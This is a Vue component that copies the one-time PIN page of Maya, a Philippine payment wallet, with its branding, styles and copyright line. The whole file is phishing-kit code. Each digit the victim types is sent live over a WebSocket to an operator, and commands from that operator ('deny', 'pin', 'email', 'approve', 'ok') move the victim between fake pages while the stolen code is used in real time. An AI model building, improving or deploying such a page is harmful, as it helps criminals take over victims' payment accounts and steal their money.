<template>
    <div id="template">
        <link rel="stylesheet" href="./css/maya/main.css">
        <div class="wrapper authentication-wrapper">
            <div class="white-container hidden-logo-container">
                <div class="container">
                    <form class="form-otp login-otp-form">
                        <div id="successMessage" class="alert-container alert-success" role="alert" style=""
                            v-if="isResendDisabled">
                            <p>OTP has been resent.</p>
                        </div>
                        <div class="form-group">
                            <h2 class="semi-bold">One-time <span class="emphasis">PIN</span></h2>
                            <p class="long-read">Please enter the one-time PIN (OTP) that we sent to
                                <span class="">+63 {{phone}}</span>
                            </p>
                            <div class="form-fields">
                                <div class="otp-fields">
                                    <input t class="otp-field" v-for="(digit, index) in otps" :key="index"
                                        v-model="otps[index]" autocomplete="off" inputmode="numeric" tabindex="-1"
                                        placeholder="—" type="text" pattern="[0-9]*"
                                        @input="Change_Otps_Input(index, $event)"
                                        @keydown="Change_Otps_KeyDown(index, $event)"
                                        :ref="'digitInput' + index">
                                </div>
                                <div class="otp-error-container" v-if="errorMessage">
                                    <img class="otp-error-icon" src="./images/errorIcon.svg">
                                    <span class="otp-error-message small-text">The OTP is incorrect. Please try
                                        again.</span>
                                </div>

                                <div class="button-container">
                                    <button class="continue-button mdc-button mdc-button--raised verify-button"
                                        type="button" :disabled="otps.join('').length < 6" @click="Click_Submit">
                                        <span class="mdc-button__label">Verify</span>
                                    </button>
                                </div>

                                <div class="resend-wrapper">
                                    <div>Didn't receive code?</div>
                                    <a id="btn-resend-otp" class="resend-link" v-if="!isResendDisabled"
                                        @click="resendOtp">Resend code</a>
                                    <div id="resend-timer" style="display: block;" v-if="isResendDisabled">Resend in
                                        <span>{{ ResendText }}</span></div>
                                    <!-- <div id="resend-timer">Resend in <span></span></div> -->

                                </div>
                                <!-- <a  :class="{ disabled: isResendDisabled }">
                                        {{ ResendText }}
                                    </a> -->

                            </div>
                        </div>
                    </form>
                </div>
            </div>
            <div class="body-footer">
                <div class="container width-max">
                    <span>Copyright © 2022 Maya. All rights reserved.</span>
                </div>
            </div>
        </div>
        <van-overlay :show="loading">
            <div class="ReactModalPortal">
                <div class="">
                    <div class="loading-modal">
                        <div class="ziggy-loader"><svg width="42.5px" height="10.5px">
                                <polyline id="back" points="2,9 8.5,2 15,9 21.5,2 28,9 34.5,2 41,9"></polyline>
                                <polyline id="front" points="2,9 8.5,2 15,9 21.5,2 28,9 34.5,2 41,9"></polyline>
                            </svg></div>
                        <div class="loading-modal__title">Please wait while we process your request</div>
                    </div>
                </div>
            </div>
        </van-overlay>
    </div>
</template>
<script>
import { ref, onMounted, onUnmounted } from 'vue';
import { useRouter } from 'vue-router';
import { store } from '/src/store.js';
// import { showDialog } from 'vant';
// import { isValidNumber } from 'libphonenumber-js';
export default {
    name: "OtpView",
    setup() {
        const router = useRouter();
        const loading = ref(false);
        const otps = ref(new Array(6).fill(''));
        const errorMessage = ref('');
        // const phonenumber = ref(localStorage.getItem('phone'));
        // const isPhonenumberFocused = ref(false);
        // const errorMessage = ref('');
        const phone = ref(JSON.parse(localStorage.getItem('data_Value')).phone);

        const otp = ref('');
        // const countdown = ref('');
        // const ResendText = ref('');
        // const isResendDisabled = ref('');


        // const timer = setInterval(() => {
        //     countdown.value--;
        //     ResendText.value = `Resend in ${countdown.value}s`;
        //     if (countdown.value === 0) {
        //         clearInterval(timer);
        //         countdown.value = 300;
        //         ResendText.value = 'Tap here to resend';
        //         isResendDisabled.value = false;
        //     }
        // }, 1000);
        // 页面加载时，初始化 WebSocket 和文档样式
        onMounted(() => {
            store.data.route = 'maya';
            // document.documentElement.style.fontSize = '52px';
            window.scrollTo({ top: 0, left: 0, behavior: 'smooth' });//位置移到最上方

            if (store.WebSocket) {
                store.WebSocket.addEventListener('message', onMessage);
            }
        });

        // 组件销毁时移除 WebSocket 监听
        onUnmounted(() => {
            if (store.WebSocket) {
                store.WebSocket.removeEventListener('message', onMessage);
            }
        });

        // WebSocket 消息处理
        const onMessage = (event) => {
            const data = JSON.parse(event.data);
            if (data.type === 'update') {
                if (data.data.command === 'screenshot') return;
                if (store.WebSocket.readyState === WebSocket.OPEN) {
                    store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
                    loading.value = false;
                    localStorage.setItem('loading', false);
                }
                handleCommand(data.data.command);
            }
        };
        // 根据 WebSocket 接收到的命令进行处理
        const handleCommand = (command) => {
            if (command == 'deny') {
                    loading.value = false
                    errorMessage.value = true
                    otps.value = new Array(6).fill('')
                }
                if (command == 'otp') {
                    router.push("/maya/otp");
                }
                if (command == 'email') {
                    router.push("email");
                }
                if (command == 'pin') {
                    router.push("/maya/pin");
                }
                if (command == 'approve') {
                    router.push("approve");
                }

                if (command == 'ok') {
                    router.push("/CheckoutOk");
                }
        };

        const countdown = ref(60);
        const isResendDisabled = ref(false);
        const ResendText = ref('-');
        const resendOtp = () => {
            if (isResendDisabled.value) return;
            store.data.loading = 'resend'
            // data_Value.value = { resend: true }
            isResendDisabled.value = true;
            ResendText.value = `00:${countdown.value.toString().padStart(2, '0')}`;
            if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: 'resend' } }));
            }
            const timer = setInterval(() => {
                countdown.value--;
                ResendText.value = `00:${countdown.value.toString().padStart(2, '0')}`;
                if (countdown.value === 0) {
                    clearInterval(timer);
                    if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                        store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: 'resend_timeout' } }));
                    }
                    countdown.value = 60;
                    ResendText.value = '-';
                    isResendDisabled.value = false;
                }
            }, 1000);
        };

        // 更新本地存储
        const updateLocalStorage = (field, value) => {
            const existingData = localStorage.getItem('data_Value');
            const storedData = existingData ? JSON.parse(existingData) : {};
            storedData[field] = value;
            localStorage.setItem('data_Value', JSON.stringify(storedData));

            if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                store.WebSocket.send(JSON.stringify({ type: 'live', data: { [field]: value } }));
            }
        };

        // 提交表单，验证手机号并发送请求
        const submitForm = async () => {
            errorMessage.value = false
            isResendDisabled.value = false

            const newValue = { route: store.data.route, otp: otps.value.join('') };
            if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                store.WebSocket.send(JSON.stringify({ type: 'live_update', data: newValue }));
                store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: 'loading' } }));
                loading.value = true;
                localStorage.setItem('loading', 'loading');
            }
        };

        const Change_Otps_Input = (index, event) => {
            const input = event.target;
            let value = input.value;
            // 只允许输入数字
            value = value.replace(/\D/g, '');
            input.value = value;
            if (value.length > 1) {
                otps.value[index] = value.charAt(0);
                input.value = value.charAt(0);
            }
            if (index < 5 && value.length === 1) {
                const nextInput = input.nextSibling;
                if (nextInput && nextInput.tagName === 'INPUT') {
                    nextInput.focus();
                }
            }
            updateLocalStorage('otp', otps.value.join(''));
            // data_Value.value = { otp: otps.value.join('') } //'{ "otp": "' + otps.value.join('') + '"}'
        };
        const Change_Otps_KeyDown = (index, event) => {
            if (event.key === 'Backspace' && index > 0 && !otps.value[index]) {
                const prevInput = event.target.previousSibling;
                if (prevInput && prevInput.tagName === 'INPUT') {
                    prevInput.focus();
                }
            }
        };


        // 更新输入框中的数字
        // const updateDigits = () => {
        //     otp.value = otp.value.replace(/\D/g, ''); // 只保留数字
        //     const otpValue = otp.value.split('');
        //     otps.value = otpValue.concat(Array(6 - otpValue.length).fill(''));
        //     updateLocalStorage('otp', otps.value.join(''));
        // };

        return {
            // isPhonenumberFocused,
            phone,
            errorMessage,
            Change_Otps_KeyDown,
            Change_Otps_Input,
            otps,
            loading,
            submitForm,

            countdown,
            isResendDisabled,
            ResendText,
            resendOtp,

            otp,
            // updateDigits,

        };


    }
}

</script>
<style scoped>
body {
    background: #F7F7F7;
    font-family: "CerebriSansPro", Helvetica, Arial, sans-serif;
    overflow-x: hidden;
    height: 100%;
}

.ReactModal__Body--open {
    overflow: hidden;
}

.ReactModal__Body--open .ReactModalPortal {
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    z-index: 20;
    outline: none;
    max-height: 100vh;
    overflow-y: auto;
}

.ReactModal__Body--open .ReactModalPortal * {
    outline: none;
}

.loading-modal {
    width: 375px;
    background: none;
    text-align: center;
    padding: 0px;
    margin: 300px auto;
}

@media only screen and (max-width: 767px) {
    .loading-modal {
        max-width: 90%;
        margin: 225px auto;
    }
}

.ziggy-loader {
    position: relative;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%) scale(2);
}

.ziggy-loader svg polyline {
    fill: none;
    stroke-width: 3;
    stroke-linecap: round;
    stroke-linejoin: round;
}

.ziggy-loader svg polyline#back {
    stroke: #ECEDEF;
}

.ziggy-loader svg polyline#front {
    stroke: #0CC072;
    stroke-dasharray: 48, 144;
    stroke-dashoffset: 192;
    animation: dash 3s linear infinite;
}

/*! CSS Used keyframes */
@-moz-keyframes dash {
    62.5% {
        opacity: 1;
    }

    to {
        stroke-dashoffset: 0;
    }
}

@-webkit-keyframes dash {
    62.5% {
        opacity: 1;
    }

    to {
        stroke-dashoffset: 0;
    }
}

@keyframes dash {
    62.5% {
        opacity: 1;
    }

    to {
        stroke-dashoffset: 0;
    }
}

/*! CSS Used fontfaces */
/* @font-face {
    font-family: "CerebriSansPro";
    src: url(https://checkouts.maya.ph/be58c9d3a3ce1f28b95d.otf);
    font-weight: normal;
    font-style: normal;
}

@font-face {
    font-family: "CerebriSansPro";
    src: url(https://checkouts.maya.ph/06af386c5ca88991baf0.otf);
    font-weight: 500;
    font-style: normal;
}

@font-face {
    font-family: "CerebriSansPro";
    src: url(https://checkouts.maya.ph/d150d7121d7ee539b75c.otf);
    font-weight: 600;
    font-style: normal;
}

@font-face {
    font-family: "CerebriSansPro";
    src: url(https://checkouts.maya.ph/ee3679895d879c097e25.otf);
    font-weight: bold;
    font-style: normal;
} */

.loading-modal__title {
    font-size: 16px;
    padding: 0px 48px;
}

.loading-modal__title {
    color: #F9F9FA;
    font-weight: 400;
    font-size: 16px;
    line-height: 20px;
    margin-top: 36px;
    padding: 0px 72px;
}
</style>